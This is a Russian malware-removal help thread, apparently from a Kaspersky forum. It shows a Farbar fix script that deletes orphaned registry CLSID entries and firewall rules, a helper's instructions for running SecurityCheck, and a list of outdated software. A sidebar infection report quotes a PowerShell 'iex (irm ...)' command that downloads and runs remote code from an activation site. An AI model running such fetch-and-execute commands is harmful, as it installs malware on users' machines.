CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{912F8D58-2141-48F7-A302-0E1FB170283C}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{9393C393-C594-49A6-B23B-DA10A5962313}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{95EB7FA8-A76F-4DC9-8139-8ED3AD8ECF65}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{96FF122A-F22C-4A1A-A4B0-40B99E84FE73}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{991E0034-F05D-4E9F-BB77-8D5764FBE2B6}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{9B123B52-A4A0-4CE1-9389-99608660326A}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{9B4FFBB7-A9A6-45B0-8C60-807F58E39008}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{9CB99683-BCE8-42EF-87E0-28AD83B400CB}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{9EA0B7CD-B3AF-480A-8409-C9BA4ECEAB8E}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{9EE6493A-473A-4698-960E-82505A104E45}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{9FCCDB89-83DC-4431-ADF3-B77A94109E7D}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A01567B6-E648-40BA-86DF-92D28A761544}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A09B9D47-75B0-487B-B468-8B576BACBEEA}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A1180A3C-A136-497A-9CF8-5EA72F6AA7A2}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A14E2CBA-A647-425D-AD36-16A504F354DF}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A218E6A7-15CA-47F9-87B4-AAC2043BCF2B}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A2E44B0B-11F6-455B-AFFC-A46BCD1184A1}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A318EBE6-0796-4CEE-89A3-D62012765A33}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A6085C88-E1CE-4542-AA0F-52C88CA62E6E}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A6A5BBFD-83AF-4812-B945-D1C6E3F2EF83}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A760C2C2-1A3C-48A8-8B28-742E3520AA56}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A80BF260-8DC0-4F5F-95EF-F969B81C256B}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A83C39E3-6D93-4150-9B9F-2D682C38E8B4}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{AA875EED-E5A5-4D08-A0DF-39CB11201F27}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{AABA8228-AF0F-4032-B728-49023DFA6523}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{AC2F6BA5-873B-41F0-ACAC-19653277A728}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{AEC6E32D-AF86-49C3-A1F9-5C34C4FD51BB}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{B6141600-140E-4820-8A25-3858E2DDD79A}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{B7DD785E-64ED-4BF2-B473-400BA294B096}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{B8456B12-E863-4380-B37E-F03DEF658953}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{B84D0888-9CA5-4A12-828E-29216C486126}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{B86A7B0B-998D-4B94-8BA7-843DA969E1DC}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{B86EFD19-7EC7-46CF-8786-39DE6DEC48C3}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{B88990C2-4D7B-427F-B9D0-27CF7F0F1917}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{BA0AA4AC-C5E4-494B-A7D6-4F8EC345B413}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{BD1C1F61-789E-499B-9097-FC7C0EA49C6C}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{BD21C0FE-ED8F-4FD3-97F6-01849523CC93}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{C0F9FC52-4C1B-4078-A9FB-889D655655ED}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{C25AFEB5-0FF4-4DA9-8956-71DB1FE2EEC8}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{C3EE6319-7277-49FC-8EDE-0AE3D1E2C911}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{C4E0AB99-8443-44E8-AAE7-2A8200ACF692}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{C5295FFB-DAE1-4361-AC96-789041BBCD66}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{C64EB020-FE53-4C53-99FF-9AA2F302FA10}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{C6B38D30-8236-4AA3-AC8B-EEA5E1F0F9A5}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{CA473827-C1B1-4382-995C-E9C93A7AF94B}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{cadc4b84-0da0-42bc-b309-d4f3e20213ae}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{CB066B69-6C99-4CD6-B1FE-39A937E91770}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{CBE10065-702B-4A16-BBD4-D2046A202C38}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{CBE2A803-A396-4E0C-AD89-470865BBEE41}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{CC2542AB-386F-4BF6-972F-73037BBA93D6}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{CCFAFFBA-2675-4FA8-B71A-693CDE9FA843}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{CDF9A529-469D-4FF1-B6AB-FD81B617A72C}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{D0427B9F-DE04-40D4-A31A-23A1724C56ED}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{D13ECD95-AD3C-4007-B2B9-E74FF3FE0757}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{D2C54083-2EA2-443C-8094-E29EC26FD73A}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{D3A879D7-336D-475F-A896-382AA121E30A}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{D845777E-7DE6-4F2D-9EF5-30CB8EE0B1C7}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{D88D6DA1-FD0B-42FC-B304-14978F173EC9}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{D96771C9-2440-4654-AC2E-262EA631B601}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{DA01C88D-3F5F-407C-BF9A-777275B65124}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{DC5C2497-97B0-4D40-93DD-4870E6413ABA}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{DCDCA1C1-4C6A-4382-BCFC-E557750CE2AC}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{DCDD3BEA-1A66-431F-ADCB-FAEBB64BB01E}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{E4734B94-5B4C-4952-AB5A-09AECF8010B2}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{E907DE1B-C1E3-4586-8E1A-7B9568850026}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{EBDDF7EF-BA1C-4891-970C-D506A70CC12B}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{ED2A88F2-332A-47FD-AF21-E43836E904CC}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{EE0D621A-6FEF-4BFE-97E3-0B4B8A0E50E0}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{EEEE1816-C285-42BC-A44D-2F18EF54BDC2}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{EFD469AF-B401-4D23-BB7F-DFDB5C80AA72}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{F3D75CD7-2E9A-421E-92E2-0F48D3C7DB73}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{F3F47E45-D676-4D07-A483-98E5B026EE17}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{F42B0F31-F464-4E7F-9B02-5C595DD03D7E}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{F46AAFD0-C9C9-400F-A9E1-EB97C742C240}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{F4810E07-D17B-4672-BE55-79249BA88F3F}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{F4CE19C5-678A-49D4-A06E-991F65A273CD}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{F70B79F4-58AB-40F8-8B3F-9630E302CD5B}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{F7280F89-A31B-40DA-BD43-3E588ED8394C}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{F8CAD947-0366-4D47-83F5-6D65FF353B72}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{FABFBA06-C426-49AF-9B89-6645D988CDC9}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{FD47A6DC-FB82-47F2-8C06-3A9C40BE0FBB}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{FD82EFE8-5868-461D-9419-18BDCBB95A82}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{FDAE11E1-5F03-4BE7-945A-21ED2BB5D3DF}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{FE0912D2-2329-44B0-A156-D7EBDF7947FB}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{FF2557E6-1F96-4013-92B8-639C1F395DB7}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
FirewallRules: [{704F28B2-2464-44BA-93EB-D56AA55A3C55}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => Нет файла
FirewallRules: [{18E7F388-09FA-4F90-9759-8FB88A461900}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => Нет файла
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.


 
thyrex

thyrex

Опубликовано
Опубликовано

Загрузите SecurityCheck by glax24 & Severnyj и сохраните архив на Рабочем столе.

  • Разархивируйте, запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10/11);
  • Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу;
  • Дождитесь окончания сканирования, откроется лог в Блокноте с именем SecurityCheck.txt;
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt;
  • Прикрепите этот файл в своем следующем сообщении.


 
thyrex

thyrex

Опубликовано
Опубликовано

По возможности исправьте:

 

AnyDesk v.ad 6.1.0 Внимание! Скачать обновления
TeamViewer v.15.13.6 Внимание! Скачать обновления
Microsoft Office - профессиональный выпуск версии 2003 v.11.0.6361.0 Данная программа больше не поддерживается разработчиком. Обновите Microsoft Office до последней версии или используйте Office Online или LibreOffice
WinRAR 6.00 бета 2 (64-разрядная) v.6.00.2 Внимание! Скачать обновления
ICQ (версия 23.2.0.48119) v.23.2.0.48119 Данная программа больше не поддерживается разработчиком.
Adobe Acrobat (64-bit) v.25.001.20630 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - Проверить обновления!^
360 Extreme Browser v.22.3.5080.64 Браузер был установлен в составе другого ПО. Рекомендуется деинсталлировать его и использовать Google Chrome, Brave или Vivaldi.
Yandex v.25.8.0.1908 Внимание! Скачать обновления
^Проверьте обновления через меню Дополнительно - О браузере Yandex!^
Google Chrome v.139.0.7258.154 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - О браузере Google Chrome!^
The Bat! v9.3.0.2 (64-bit) v.9.3.0.2 Внимание! Скачать обновления


---------------------------- [ UnwantedApps ] -----------------------------
Кнопки сервисов Яндекса на панели задач v.3.7.9.0 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
 

На этом закончим.

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • VanyeJ
      Вирус в PowerShell
      Автор VanyeJ
      Здравствуйте, при включении компьютера и окончательном входе в систему PowerShell пытается перекинуть на вредоносную ссылку. Касперский сразу же блокирует.

      Событие: Остановлен переход на сайт
      Пользователь: WIN-O4R3Q0UCBR5\User
      Тип пользователя: Инициатор
      Имя приложения: powershell.exe
      Путь к приложению: C:\Windows\System32\WindowsPowerShell\v1.0
      Компонент: Интернет-защита
      Описание результата: Запрещено
      Тип: Вредоносная ссылка
      Название: 
      Точность: Точно
      Степень угрозы: Высокая
      Тип объекта: Веб-страница
      Имя объекта: 1731762779-9803.jpeg
      Путь к объекту: 
      Причина: Облачная защита

      Активировал Windows через cmd после этого появилось (powershell iex (irm 'activated.run/key')) команда после которой вирус появился.
      CollectionLog-2025.02.08-15.48.zip
    • SimpleMan
      Помогите устранить вирус который засел в PowerShell
      Автор SimpleMan
      Недавно активировал Windows 11 Pro через командную строку cmd, через какой-то левый KMS сервер, не разобрался как это работает, 
      проработал так несколько дней, потом решил установить антивирус Касперского и он сразу же обнаружил Вредоносные ссылки через PowerShell 
      пример такой активаций есть везде, вот: https://vk.com/wall-188198781_5982
      Подскажите пожалуйста, как теперь устранить проблему?
      скриншот отчёта прилагаю
       
    • Winbeecatcat
      При запуске запускается PowerShell и закрывается
      Автор Winbeecatcat
      каждый раз когда я включаю ноутбук при запуске запускается повершел а потом закрывается, раньше когда у меня был виндовс дефендер он просто писал про троян malgent а сейчас с касперским пишет то что повершел пытался открыть сайт с гифкой с соником и надписью no way (скриншот)
      Сегодня, 16.03.2025 20:37:01;Остановлен переход на сайт;Yandex with voice assistant 
       

    • saha96
      Добавление в планировщик команды PowerShell
      Автор saha96
      Доброго времени суток! Есть задача автоматизировать обновление файла RDP Wrapper под актуальную сборку после обновления винды. Обновление файла, необходимого для его работы выполняется из PowerShell следующим образом
       Stop-Service termservice -Force
      Invoke-WebRequest https://raw.githubusercontent.com/sebaxakerhtc/rdpwrap.ini/master/rdpwrap.ini -outfile "C:\Program Files\RDP Wrapper\rdpwrap.ini"
       
      Как корректно добавить данную команду в планировщик и запустить выполнение раз в месяц?
    • ilia_.7
      PDM:Trojan.Win32.GenAutorunSchedulerTaskRun.b & Windows PowerShell
      Автор ilia_.7
      ноутбук новый системные приложения такие как PowerShell, Edge и другие уже были и не переустанавливались.
      не сразу, но стал замечать что в рандомные моменты на мгновенье, приостанавливая все процессы, возникало окно с заголовком пути к PowerShell-у, но только через папку sustem32
      я его перемещал, и на время возникновения прекратились, но потом мне понадобилось PowerShell вернуть на место для работы с ним, и он не хотел ни как перемещаться, но зато он копировался. оба, отдельный и в system32 не хотят удаляться. после возникновения возобновились.
      касперский при возникновениях в мониторинге активности выводит следущее сообщение:
      17.11.2024 13:30:07;Запрещено;Windows PowerShell;powershell.exe;C:\Windows\System32\WindowsPowerShell\v1.0;23452;IRBIS-15NBC1012\Irbis;Активный пользователь;Запрещено: PDM:Trojan.Win32.GenAutorunSchedulerTaskRun.b;Запрещено;PDM:Trojan.Win32.GenAutorunSchedulerTaskRun.b;Троянское приложение;Высокая;Точно;powershell.exe;powershell.exe;c:\windows\system32\windowspowershell\v1.0;Процесс;
       
      CollectionLog-2024.11.21-20.30.zip
×
×
  • Создать...